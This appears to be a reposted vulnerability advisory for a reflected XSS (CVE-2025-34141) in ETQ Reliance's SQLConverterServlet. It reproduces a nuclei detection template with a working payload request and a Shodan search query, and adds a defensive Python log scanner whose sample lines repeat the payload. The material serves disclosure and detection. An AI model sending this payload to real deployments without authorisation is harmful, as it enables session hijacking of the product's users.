ETQ Reliance Reflected XSS via SQLConverterServlet Vulnerability

Vulnerability Information

Vulnerability name: ETQ Reliance Reflected XSS via SQLConverterServlet Vulnerability

Vulnerability IDs:

  • CVE: CVE-2025-34141

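Vulnerability type: Cross-site scripting (XSS)

Severity: Medium

Description: A reflected cross-site scripting (XSS) vulnerability exists in the SQLConverterServlet component of the ETQ Reliance CG (legacy) platform. The vulnerability requires user interaction, such as clicking a crafted link, and may result in unauthorized scripts executing in the user's context. The affected servlet was unnecessarily exposed to authenticated users and has been disabled in version SE.2025.1.

Affected product: ETQ Reliance CG (legacy) is a quality management software platform, widely used in enterprise services to track and manage quality processes. Typical deployment scenarios for the platform include industries such as manufacturing, healthcare, and financial services.

Explanation: This vulnerability is a cross-site scripting (XSS) issue. Its technical root cause is improper handling of user input by the SQLConverterServlet component, which lets an attacker inject malicious script. The script executes in the victim's browser and may steal session tokens or other sensitive information.

Impact analysis: An attacker who successfully exploits this vulnerability can execute arbitrary JavaScript in the context of an authenticated user's browser session, which may lead to session hijacking or unauthorized actions. Because user interaction is required, automated exploitation of this vulnerability is less likely, but its potential security risks include data leakage and service disruption.

Vendor: ETQ

Product: ETQ Reliance CG (legacy)

Affected versions: version < SE.2025.1

Search syntax: html:"ETQ Reliance"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/49ebb40a9df9214701e1423a4ece95cfd3879eaa/http%2Fcves%2F2025%2FCVE-2025-34141.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC details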


id: CVE-2025-34141

info:
  name: ETQ Reliance - Reflected XSS via SQLConverterServlet
  author: slcyber,pdresearch
  severity: medium
  description: |
    A reflected cross-site scripting (XSS) vulnerability exists in ETQ Reliance CG (legacy) platform within the SQLConverterServlet component. This vulnerability requires user interaction, such as clicking a crafted link, and may result in execution of unauthorized scripts in the user's context. The affected servlet was unnecessarily exposed to authenticated users and has since been disabled in version SE.2025.1.
  impact: |
    Successful exploitation allows attackers to execute arbitrary JavaScript in the context of an authenticated user's browser session, potentially leading to session hijacking or unauthorized actions.
  remediation: |
    Upgrade to ETQ Reliance version SE.2025.1 or later where the SQLConverterServlet has been disabled.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-34141
    - https://slcyber.io/assetnote-security-research-center/how-we-accidentally-discovered-a-remote-code-execution-vulnerability-in-etq-reliance/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2025-34141
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 2
    shodan-query: html:"ETQ Reliance"
  tags: cve,cve2025,etq-reliance,xss

flow: |
  http(1)
  if(template.path){
    http(2)
  } else {
    set("path","reliance")
    http(2)
  }

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: header
        internal: true
        name: path
        group: 1
        regex:
          - 'Location: https?://.*?/(.*?)/'

  - raw:
      - |
        GET /reliance/SQLConverterServlet?MySQLStm=%3C/textarea%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - '</textarea><img src=x onerror=alert(document.domain)>'
          - 'You have to start the ENGINE application before using this form.'
        condition: and
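
For defenders, the request shape this template sends can be looked for in web access logs. The following is an added example, not part of the original post or of the nuclei template: it flags any request to SQLConverterServlet (which is disabled from SE.2025.1 on) and separately flags requests whose decoded MySQLStm value contains angle brackets. The log format, client addresses, user names and the /etq/ and /reliance/index.html paths are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines for illustration; not taken from the page.
SAMPLE_LOG = """\
10.0.0.5 - alice [23/Jul/2025:10:01:02 +0000] "GET /reliance/SQLConverterServlet?MySQLStm=select%201 HTTP/1.1" 200 2310
10.0.0.9 - bob [23/Jul/2025:10:03:44 +0000] "GET /reliance/SQLConverterServlet?MySQLStm=%3C/textarea%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1" 200 2391
10.0.0.7 - carol [23/Jul/2025:10:05:10 +0000] "GET /reliance/index.html?q=%3Cb%3E HTTP/1.1" 200 512
10.0.0.12 - dave [23/Jul/2025:10:06:00 +0000] "GET /etq/SQLConverterServlet?MySQLStm=%3Cb%3Ex HTTP/1.1" 200 2330
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# The template's probe closes a <textarea>, so angle brackets are the signal.
MARKUP_RE = re.compile(r"[<>]")


def classify(line):
    """Return None, 'servlet-access' or 'markup-in-MySQLStm' for one log line."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    # The context path varies per deployment (the template reads it from a
    # redirect), so match on the servlet name rather than on /reliance/.
    if not url.path.rstrip("/").endswith("/SQLConverterServlet"):
        return None
    # parse_qs percent-decodes the values, so %3C is seen as '<'.
    values = parse_qs(url.query, keep_blank_values=True).get("MySQLStm", [])
    if any(MARKUP_RE.search(value) for value in values):
        return "markup-in-MySQLStm"
    return "servlet-access"


def scan(log_text):
    """Return (line_number, client, finding) for every line worth reviewing."""
    findings = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        finding = classify(line)
        if finding:
            findings.append((number, line.split()[0], finding))
    return findings
```

Calling `scan()` on a log's text returns one tuple per request to the servlet; the `markup-in-MySQLStm` entries are the ones that match the reflected-XSS pattern described above.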



http://example.com/2025/07/23/github_141416666/
Author
lianccc
Published
July 23, 2025